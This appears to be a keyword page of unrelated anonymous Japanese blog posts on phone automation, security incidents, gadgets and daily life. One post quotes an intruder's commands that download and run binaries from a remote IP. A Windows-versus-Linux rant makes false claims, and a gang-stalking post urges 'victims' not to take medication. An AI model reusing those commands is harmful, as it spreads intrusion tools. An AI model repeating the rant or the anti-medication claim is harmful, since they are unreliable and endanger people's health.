  |
はてなキーワード: クラッキングとは
すべての泥信者にTaskerの素晴らしさを伝えるべく、本エントリーを投下したい。
・(Not) Headset Plugged Any → Media Volume Level [任意の値]
イヤホン挿入時はMedia Volume Level 1、非挿入時はMedia Volume Level 0にしています。
Media Volume Leve 0 の代わりにSilent Modeを設定しても構いません。
また、挿入時レシピにはMedia Volume Level 1と一緒にIn-Call VolumeのTaskも入れてます。イヤホンから大音量の着信音が聞こえてきたら怖いですから。
・(YouTubeなどの)Application → Display AutoRotate On
普段は画面固定で、特定アプリ(YouTubeなど)使用時だけ回転させる使い方が多いのではないかと思われます。
・New Package → App Manage Settings
私は基本的にアプリの通知をOFFにしているのですよ。ノイズ耐性がないのです。
新しいアプリをインストールするたびに手動で設定画面を立ち上げ、通知をOFFにするのは面倒です。また、OFFにするのを忘れると困るのでこのレシピを使ってます。
App Manage SettingsはApp Settingsでも良いです。
私はモバイルWi-FiルーターとセットでNexus 5をSIMナシWi-Fi運用しているのですよ。
で、スリープ時はネット接続要らないのでこのレシピ入れてます。
・Wifi Near, [任意の] SSID, Invert → Lock [任意のCode]
自宅に飛んでいるWi-FiのSSIDを設定すれば、外出時だけパスコードロックをかけることができます。
このレシピは特定のWi-Fiが近くにあるだけで有効になります。Wi-Fiに接続されている必要はありません(Wi-FiがONになっている必要はあります)
・Mobile Network, On, On, On, ON → Lock [任意のCode]
SIM抜き運用なので、盗難で誰かがSIMマウントしたらロックがかかります。
一度ロックがかかったら、SIMを抜いてもロックコードを入力する必要があります。
ちなみにこの時かけるロックコードは上記『Wifi Near』のコードとは異なります。つまり『Wifi Near』のコードをうまく突破してもまたクラッキングする必要があるのです。
・BT Connected → Lock [任意のCode]
私は青歯使わないのですよ。
ペアリング面倒ですし、相性問題で接続が不安定なこともありますし。
BTを接続した瞬間3つ目のコードを要求されます。不届き者はきっとブチ切れるでしょう。
私が使っているTaskerのレシピは以上です。
みんな自由に使っていいぜ。あばよ!
その前に、疑わしきは罰せず、証拠もないのにひとを疑ってはいけない。疑わしきは容疑者に有利にという 法律の大原則をもって
「サイトの内容を書き換えた」のがその人間である。という証拠を持ってきてから言えよ。
セキュリティーがザルで、ボットでも書き換えられる状態で放置されてるとしたら、今のネットの状況だと数ヶ月で自動ハッキング食らってもおかしくないぞ。
1日のどれだけのクラッキングボットからのアクセスが有ると思ってんだ。
大量の不正アクセス自動ボットがそこら中にうようよしている状況で、そういつを犯人だとする理由をまず言えよ。
逆に、証拠が合って言ってるなら、こっちも、文句は言わないよ。証拠出せよ。
落としたサイフを拾ってくれた奴に、お前が盗んだんだろ!って言えば誰だって怒るだろ?いまそういう状態だろ。じゃぁ、証拠出せよってなるのは当然。
うんこかうんちか迷ったが、うんこだと「だめな」という意味にも取れそうなのでうんちにした。ふざけてると思われるかもしれないが内容はマジメだ。
世界のすべてを整理することを標榜するGoogleでも検索できないことがある。それがうんち画像だ。
といっても別にスカトロの趣味があってうんこを探したいわけじゃない。こないだおなかの調子がわるくなって不安になって病状をいろいろ調べたたら、どのサイトにも「うんちの色で判断しよう」と書いてあった。胃腸の調子が悪いと内部で出血が起きて、そのせいでうんちが黒くなるらしい。
なるほど理屈はわかった。でも黒いうんちってどんな色だ? 黒っていってもイカスミのように真っ黒なのか、焦げ茶程度の黒なのかさっぱりわからない。そう言われてみれば黒い気もするが前にもこのくらいの色は合った気がする。しかしどうやってもそれを画像で調べることができない。不安がつのるばかりだ。
こういうときのためにうんちデータベースサービスが欲しいとおもった。色や形で健康状態を判断できるというサービス。体調を見るのにうんちの状態は欠かせないのに、それを調べることができないのはなんとももどかしい。
だけどこんなもんまともにつくったら単なるスカトロサイトだ。究極のブラクラサイトだ。食事中にシェアさせていただいた画像を目にしたらその日は1日中鬱になる。
で、はたと気づいた。うんちまともに見せなければいい。色や形のデータを大量に蓄積しておいて、あとはスマホで写真に撮ってデータベースと照合。色をカラーチャートで判別したり、やわらかさとかは画像である程度判別できる。投稿者のデータはさらにデータベースとして活用していくが、画像そのものは一切世に出ない。個人情報漏れたらリアルでうんち漏れることになるので、ユーザー登録とかはせずに匿名でつかえるようにすれば平和だ。あとはサイトがクラッキングされて大量のうんち画像が世に出回ることがないようセキュリティも厳重にしておいてほしい。
健康な人にはまったく関係ない悩みかもしれないが、胃腸が悪いときのうんちは本当に大事な情報だ。それをもっと客観的に調べられるようなサービスが望まれる。
想像をはるかに超える高速性と安定性を持つWindows ServerをメインにWindows+Linuxのハイブリッド環境でインフラを構築
http://gihyo.jp/admin/serial/01/gloops/0001
IISとASP.NET,そしてC#で書かれたアプリケーションが
想像をはるかに超える高速性を実現していることが挙げられます。
そのうえ,安定して動作しているのです。
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090609/331590/?SS=imgview&FD=-654674548
HPCでもダントツのパフォーマンスをたたき出すWindows
ttp://cloud.watch.impress.co.jp/docs/interview/20101224_416025.html
ttp://wsmgr.jp.brothersoft.com/screenshot-50450.html
NASパフォーマンス比較テストでWindowsがLinuxを圧倒!!
ttp://www.flexense.com/documents/nas_performance_comparison.pdf
ttp://it.slashdot.jp/story/12/04/24/0052242/
【一方Linuxは…】
Linux Daily Topics:2011年9月2日 Kernel.orgがトロイの木馬の侵入被害に|gihyo.jp … 技術評論社
ttp://gihyo.jp/admin/clip/01/linux_dt/201109/02
Linux カーネルの基盤サイトがクラッキングの被害に - japan.internet.com
ttp://japan.internet.com/webtech/20110902/2.html
Linux Daily Topics:2011年9月15日 狙われるLinux… 今度はLinux Foundationが標的に|gihyo.jp … 技術評論社
ttp://gihyo.jp/admin/clip/01/linux_dt/201109/15
Linux Daily Topics:2011年9月2日 Kernel.orgがトロイの木馬の侵入被害に|gihyo.jp … 技術評論社
ttp://gihyo.jp/admin/clip/01/linux_dt/201109/02
Linux カーネルの基盤サイトがクラッキングの被害に - japan.internet.com
ttp://japan.internet.com/webtech/20110902/2.html
Linux Daily Topics:2011年9月15日 狙われるLinux… 今度はLinux Foundationが標的に|gihyo.jp … 技術評論社
ttp://gihyo.jp/admin/clip/01/linux_dt/201109/15
MySQL.comのWebサイトに不正なコード 闇市場でroot権限も販売か
ttp://www.itmedia.co.jp/news/articles/1109/27/news027.html
またもOSSプロジェクトが被害に! Wineプロジェクト、不正侵入を発表 | エンタープライズ | マイコミジャーナル
ttp://journal.mycom.co.jp/news/2011/10/13/115/index.html
・安定性・信頼性
フリーソフトであるLinuxの安定性・信頼性はハッキリ言って問題外。
1日連続で稼動させることすら困難。
いまやWindowsの安定性・信頼性はメインフレーム(汎用機)をも凌ぐ。
世界中のメインフレームが全てWindowsServerに置き換わったのがその証拠。
・脆弱性
Linux()
Linuxで稼動している世界中のサーバーがクラックされまくっている。
デフォルトスタンダードOSとしてあらゆる攻撃を受けてきたWindowsはいまや世界で一番強固なOSとなった。
豊富なウイルス対策ソフトもさりながら、カーネルの構造的に絶対に外部からクラックされることが無いOSとなった。
しかし上記内容により安定稼動させるのはほぼ不可能。
またサポートが存在しないため自前で何とかするしかなくかえってコスト高となる。
OSは無料ではないが従来のメインフレームのOSと比較すると安価。
もともと安定性に優れたOSであるため、誰にでも安定稼動させることが容易である。
サポート面もマイクロソフトを始め、各ベンダーが完璧なサポートを行える体制となっている。
うちの大したことに使ってもいないのに常時稼動で外部公開なサーバがクラックされて以下のコマンドが実行されていた。
sh -c cd /tmp;wget ttp://195.69.220.2/dd_ssh;chmod 755 dd_ssh;./dd_ssh 50 217.79.190.53 2 >/dev/null 2>/dev/null sh -c cd /tmp;wget ttp://195.69.220.2/slowdssh;chmod 755 slowdssh;./slowdssh >/dev/null 2>/dev/null sh -c cd /tmp;killall -9 ssh2;wget ttp://195.69.220.2/ssh3;chmod 755 ssh3;./ssh3 200 72.20.14.174 >/dev/null 2>/dev/null
((正式なリンクだと502エラーが出て書き込めないのでhを抜いてあります。))
このコマンドを実行するとドイツのサーバからプログラムをダウンロードして実行するみたい。
ちなみに、いろんなサーバにssh接続を試みるプログラムっぽい。
このプログラムたちは2007年の11月頃にビルドしたApache/2.0.61にぶら下がって動いていた。
ログは綺麗さっぱりなくなっていて、2011年7月24日以降の情報しか残っていなかった。
どうやって侵入して実行したのか分からなかったけど、古いApacheと一緒に動いていたのでApacheを更新しなかった自分が悪いと思っている。
「dd_ssh」や「ssh3」の引数を書き換えて実行してみたいけど、それって犯罪じゃないかと思うと怖くてできない。
誰か詳しく調べてちょ。
http://gigazine.net/news/20110707_pyrit/
http://d.hatena.ne.jp/sen-u/20110629/p1
わざわざ再計算しているわけだけども。
saltとか考えるとまぁアリかな。
WPA2も、PMKと呼ばれる512bitのマスターキーを秒間8万9000個
解析可能だそうな。
Zipもあった。
レインボーテーブル方式が使えないのでブルートフォース一択のはずだが、
http://www.youtube.com/watch?v=3dEN9JQ3R0U
秒間6億3千万?
ひたすらクラックしているんだろうけど、
GPUってすごい。。
試しにPIKAZIPでやってみるとCorei7で秒間600万ちょいなので約100倍。
うーん。
なんか他の使い方ねーのかな。。
どこからつっこもうかと思ったけど、やっぱやめた。
で、おっさんのクソつまんねー思い出話や愚痴でも。
ミトニックのクラッキングがすでに伝説となっていた二昔前、今じゃ考えられないがワープロで1分間に60文字打てれば「すごい人」「先進的」「ハッカー的」などと思われていた。
ソフトウェアは FDD でのコピーが横行し、そういうグレーな行動で行動で存在感を示そうとした馬鹿野郎が増えて一部で問題になっていた。
5インチFDD を使った MS-DOS が主流だったから、1990年代前半のことだ。
しばらくしたら、今じゃ考えられないが HTML をメモ帳で書いてホームページを立ち上げることができれば「すごい人」「先進的」「ハッカー的」などと思われた時代がきた。
HTML や画像に音楽・映画ファイルなどを埋め込んだり、そういうグレーな行動で存在感を示そうとした馬鹿野郎が増えて一部で問題になっていた。
メディアは 3.5インチ FDD から CD-R に代わりつつあり、Windows の新バージョンが販売されるたびに行列ができていたから、1990年代後半のことだ。
もうすこし経つと、サーバを立ち上げることができれば「すごい人」「先進的」「ハッカー的」などと思われた時代がきた。
P2Pで直接ファイルをやりとりするようになると、音楽・映画ファイルなどをアップロードしたり、そういうグレーな行動で存在感を示そうとした馬鹿野郎が増えて一部で問題になっていた。
WinMX ~ Winny が全盛だった時代だから、2001年~2005年だ。
それ以後も、同じように「技術開発」→「悪用される」の繰り返しだ。
いまだに思う。
まだまだハッカーは足りない。
単にコンピュータを利用する画家のような、クリエイティブなユーザでもいい。
0 と 1 でしか表現できない無能なコンピュータを、賢く使えるハッカーとなってほしい。
ネットワークを便利に使えるWebエンジニアが増えるほどには、そのインフラを支えるネットワークエンジニアが足らない。
仕舞いには、ITの歴史を田舎のヤンキーにこじつけて罵倒するしかできない低脳まで現れる。
そんなもん「おまえがキライ」で済ませろや。
■「はてな」では、まことしなやかに「統合失調症」といわれている集団ストーカー(ガスライティング)。
果たして、本当に嘘なんでしょうかね?
内情を知ってる人も、アンタッチャブルなものだから、腫れものに触るように接してるだけでは?(むしろ触らずというか)
■私を庇う仕草を見せた人が逮捕されたりとかあったしね。
「被害者」のブログを読んでたら、被害者・加害者とも殺された(らしき)人もいるらしい。
だから、やってる人も、必死なのかなとも思うけど。
■確かに、ヘリコプターだとか、爆音鳴らして走り去るバイクだとか、ぞろめナンバーの車だとか、道行く人の咳払いだとか、クラクションだとか、延々と続く「左に曲がります、ご注意ください」だとか、ガンつけられたりだとか、通りごとに走ってる古物回収車だとか、そんなものは実害がないから無視すればいいと思う。
でも、配達される郵便物や荷物がもれなく破損していても業者に話しても取り合ってもらえないとか、周囲にありもしない噂を流されるとか、住居侵入の痕跡とか、クラッキングの痕跡とか、生活に実害がでてくるとちょっと見逃せなくなる。
集団ストーカー被害しか受けない人もいるけど、発展するといわゆるテクノロジー犯罪になって、実際に幻聴みたいなのが聞こえてきたり、身体に傷みを感じたりするらしい。
(テクノロジー犯罪にあっている人は、かならず初期には集団ストーカーを経験しているらしい)
■犯人論については、いろいろある。
某宗教団体。公安や警察(国)。在日など、朝鮮関係者。果てはユダヤ・イルミナティー・サンヘドリン(!?)。
当初はインターネット上では公安という説が多かったようだけど、最近の流行は某宗教団体のよう。
■そして、いちばん一般の人には疑問に思われているとおぼしき、資金源について。
リストラストーカー以外はまだ納得できる説は見つからないけど、近年ものすごい勢いで発展した脳科学分野での人体実験だとか、宗教団体が団結するためのスケープゴート(いじめ対象)だとか、某国で被害者に保険金をかけて気づかれないようじわじわ殺害する保険金殺人だとか(まぐろ漁船みたいな?)、国の諜報機関によるスパイの演習だとか。
頭の弱い私には、わからないですけどね。なにかあるんでしょう、メリットが。
■インターネット上では、集団ストーカーについて記し始めると、「統合失調症」扱いする人たちが湧いてくる。
まぁそもそも、統合失調症というのは元々国とかにとって都合の悪い人たちに貼るレッテルでもあったので、使い方として間違ってはいないのだろうけど。
(でも、病院行っても治りませんよ。世の中の仕組みとは、「集団ストーカー」という病気は病院に行けば治るものなのか、と無理やり行った病院で、精神科医に「もっとお金持ちの人にすればいいのにね~」「お薬ださなきゃいけないんだよね~、うーん」とか言われましたし。ついでに、被害者の方は薬飲んじゃだめ。廃人になるよ)
統合失調症扱いが効かないなら、偽被害者扱いして仲間割れを狙う人も湧いてくる。
そもそも、集団ストーカーがそもそもありえないものなら、わざわざお節介にそんな人湧いてきますかね。大量に(ご苦労様です、なんだか)。
■まぁ、インターネット上で被害を訴えている人も、もっと冷静に論理的に訴えればいいのにとは思う。
たとえば仕事の場だったら、提案するときは何らかの根拠を示すだろうし(伝えるためのテクニックも使うだろうし)。それをなしに思い込みで決めつけて、例えば犯人論など言ってるだけでは、信じてもらえっこない。
集団ストーカーやテクノロジー犯罪被害にあって、訳わからないことばかり起こって辛いのはよく分かるけど、もっと論理的に証拠集めして示してほしい。
・・・そんなことができる人は、さっさとチョメチョメされるのかもしらんけどね。
・・・というか、残ってられてる人は、信憑性のない情報をばらまいてくれる人たちだとしたら。怖。
なんで@押したら[に、[押したら]になるんじゃー。
!@#$%^&*()_+ 1234567890-=
QWERTYUIOP{} qwertyuiop[]
ASDFGHJKL:"| asdfghjkl;'\
ZXCVBNM<>? zxcvbnm,./
なんじゃこの配列は
しかも意味不明さをさらに加速させているのが、DOSプロンプトはちゃんと押した通りのキー入力ができているということだ。
DOS窓にできてなぜ他の入力がカオス(英語キーボード風になってる?)になる。全く困った事だ。
他にも半角全角がALTキー同時押しが必要になってたり。もうわけわからん。
可能性1.chkdsk c:がまずかった
可能性2.クラッキング食らっている
可能性3.実は俺は夢をみている
キーボード(DOS窓がちゃんとなってる以上関係ない気がするが)ELECOM TK-FCM005BK
んがあ
さてどうするか
対処法1.だましだまし使う。どうにかして脳内を英語キーボード配列にして対処。
対処法2.OS再インストール。これでいけるだろうか?めんどくさい。
はまちちゃんの手法の問題点は、脆弱性を直せる立場の人よりも先にクラッカーに脆弱性を教え、しかもその利用方法まで実証し解説してみせていることにある。
なお、「先に」と書いたのは、はまちちゃんがクラッキング手法を披露した時に、理論上はサービスプロバイダもクラッカーも同時に知りうるはずだが、実際のところ、はまちちゃんが突く程度の穴を作る開発者ははまちちゃんのblogをチェックしておらず、他方クラッカーは手軽な情報源としてチェックしている可能性があるからだ。また、バグフィックスよりもクラッキングの方が早いため、どうしてもはまちちゃんに教示されたクラッカーのアタックの危険に曝される時間ができてしまうからだ。
サービスプロバイダがいつまでも直さないなら、あの「カンチョー程度の」教示も親切と呼べるかもしれない。
しかし、まずサービスプロバイダに直す機会を与えなければならない。
はまちちゃんはblogでクラッキング手法を披露する前に、まずはサービスプロバイダに「貴社サイトには◯◯という脆弱性が有ります。直す予定があるのか、直す場合はいつまでに直すのかを、◯月◯日までに返答してください。」と脆弱性を報告し、返答期限を無視し、あるいはまともなバグフィックス予定を示さなかった場合に、初めてカンチョーするべきなのだ。
(カンチョーするに至った場合であれ、殊勝にもカンチョー前に直された場合であれ、blogでネタにするのはかまわないだろう。)
ところで余談だけれども、「内臓露出」した患者に対し「カンチョー」しているというのは比喩として不正確ではないか。
はまちちゃんは脆弱性自体を突いているのだから、比喩においても失態と攻撃が部位的に一致していなければならない。
「(アナルの)隙」に対しては「カンチョー」で対応が取れているが、「内臓露出」に対しては対応が取れていない。内臓に粉末ハバネロを吹きかけるとか、そういう喩えにならなければ対応しない。
おそらく脆弱性を「内臓露出」と派手にしてみたものの、内臓を攻撃してしまうとはまちちゃんの攻撃が正当だと言いづらくなる為、あえてカンチョーを維持して読者の印象を操作しようとしたのではないか。
ふと携帯電話の着信履歴を見ると、0120から始まる見覚えのない電話番号が記
録されていた。
ちょうど、旅行会社に用事があって問い合わせをしていたところだったので、そ
の件かと思って、その番号に電話してみることにした。番号がフリーダイヤル
だという気軽さもあった。
すると、「はい、年金ホットラインでございます」という返事が返ってきた。
意外だったが、時節柄、年金関連で当局からなにか連絡があっても不思議じゃ
ない。
自分 私の携帯電話にそちらから着信があったようなのですが、ご用件は何
でしょう。
女性 こちらから電話を差し上げた件でございますね。ではお調べしますの
でお電話番号をお願いします。
女性 ありがとうございます。お名前をうかがってもよろしいでしょうか。
あれっ。名前を聞くのか。でもそれはちょっとなぁ。別に秘密じゃないけど、
一応個人情報だし、もともと向こうからかかってきた電話なんだからなぁ。
自分 えっ。えーっと・・・それは・・・
自分 うーん・・・・・・
あれ、名前を向こうから言うのか。それじゃ聞いてる意味ないんじゃないの。
まぁこういう電話を不信に思う人は、きっと俺だけじゃないからだろうけど。
でも、もし俺が本人じゃなかったら、他人に電話番号と名前を教えてることに
なるよ。まさに語るに落ちたってやつなんじゃないかな。
自分 ・・・・・・はい。
女性 ご本人様でしょうか?
自分 そうですが。
女性 では、ご本人確認のため、恐れ入りますがご住所と生年月日をおっ
しゃってください。
自分 えっ・・・。ちょっとそれはまずいような・・・
女性 ええとですね、私どもは社会保険庁から委託を受けております「年金
ホットラインXX会社」と申しまして、大切な個人情報を取り扱っているもの
ですから、ご本人様であることをきちんと確認させていただきたいのです。
うーん、言いたいことはわかるけどね。
どうもこの人は自分の立場を説明することしか頭にないみたい。
気持ちはわからないでもないけど、それなら相手の立場も理解しようとなぜ思
わないのかな。
女性 当社は社会保険庁から正式に委託を受けておりますので、社会保険庁
のホームページにもその旨記載がございます。社会保険庁のほうにお問い合わ
せ頂いても、ご確認が取れると思います。信用して頂けると思いますが。
なんだかオレオレ詐欺を彷彿とさせる感じ。まぁこのひとが詐欺を働こうとし
ているとは思えないけど。
自分 ・・・おっしゃることはわかりますが。しかし、私にはあなたがその
会社のひとであるということがわかりません。
女性 ・・・なるほど、そうですか。ではどのようにしたらよろしいでしょ
うか。
あんたがそれを言うか。なにを言ってるんだろうこのひとは。
もともと電話をかけてきたのはそっちじゃないか。
っていうかまだ何の用件なんだかわからないのに、「大切な個人情報」を教え
るほうがおかしい。
自分 では、あらためてそちらからお電話をお願いします。こちらからとく
に用事はありませんので。
女性 ・・・わかりました。わたくし「年金ホットラインXX会社」のXX
と申します。お電話ありがとうございました。
電話終わり。
女性の声からは心なしか安堵感が伺えた気がした。きっと彼女の頭の中では
「クレーマー」の文字が浮かんでいたことだろう。
しかしむしろ俺の頭の中には、高木浩光センセイの顔がちらついていた。
結局何の用だったのかわからない。
そしてそれっきり電話はかかってこなかった。
うーん。
個別の事例ではなく一般的な問題として、なんとなくおもしろいので
書き留めておこう。
このおばさんがホンモノの社会保険事務担当者だったら、どうすべきだっただ
ろうか。
それとも俺の対応にどこか間違いがあっただろうか。
同じようにかけ直した他の人は、名前や住所をスラスラ答えているのだろうか。
もしニセモノだったとしたら、どうすれば俺を騙せただろう。
もしかして俺はすでに何かに騙されているのだろうか。
電話番号でぐぐってみた。
ただしこのページが偽サイトやクラッキングや誤記載でなければね。
しかし、「この番号からワン切りがあった。電話かけたら社会保険詐欺だった」
と断定しているブログや、怪しいと不安がっているようなものも同時にたくさん
見つかった。
そもそも、わけのわからん会社に業務委託しちゃっていいのかと。
結局何の用なんだ社会保険庁。
ホントに百年安心なのか社会保険庁。
